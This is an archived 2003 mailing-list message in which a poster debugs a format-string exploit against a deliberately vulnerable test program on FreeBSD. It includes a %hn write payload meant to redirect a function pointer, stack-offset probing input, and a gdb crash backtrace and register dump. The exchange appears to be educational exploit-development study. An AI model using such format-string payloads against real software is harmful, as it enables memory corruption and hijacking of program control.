>>[%.-16457x%8$hn%.15261x%9$hn] (35) >> >^---- first question is your input still at %8$x and %9$x on the bsd box? yep, see here: > uname FreeBSD > ./vuln AAAABBBB%x%x%x%x%x%x%x%x%x 0 0xbfbffccc 1 0xbfbffcd3 helloWorld() = 0x8048770 accessForbidden() = 0x80487a0 before : ptrf() = 0x8048770 (0xbfbffad8) buffer = [AAAABBBB2805f00022806dfe4105b6cc2805f100bfbffb1480487704141414142424242] (71) after : ptrf() = 0x8048770 (0xbfbffad8) Welcome in "helloWorld" >>... >>Segmentation fault (core dumped) >> >^---- second ... what does the bt look like in gdb... here we go, the fmt seems to corrupt eax > gdb -core vuln.core GNU gdb 4.18 . . . This GDB was configured as "i386-unknown-freebsd". Core was generated by `vuln'. Program terminated with signal 11, Segmentation fault. #0 0x40517d31 in ?? () (gdb) bt #0 0x40517d31 in ?? () #1 0x8048805 in ?? () #2 0x8048767 in ?? () #3 0x8048561 in ?? () (gdb) i reg eax 0x40517d31 1079082289 ecx 0x8049a70 134519408 edx 0x280e9968 672045416 ebx 0x280e8424 672039972 esp 0xbfbffad4 0xbfbffad4 ebp 0xbfbffae0 0xbfbffae0 esi 0x1 1 edi 0x280e9960 672045408 eip 0x40517d31 0x40517d31 eflags 0x10216 66070 cs 0x1f 31 ss 0x2f 47 ds 0x2f 47 es 0x2f 47 fs 0x2f 47 gs 0x2f 47 (gdb) x/1x $eax 0x40517d31: Cannot access memory at address 0x40517d31. kind regards Ingram -- +++ GMX - Mail, Messaging & more http://www.gmx.net +++ Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
This archive was generated by hypermail 2b30 : Sat Jun 21 2003 - 11:12:57 PDT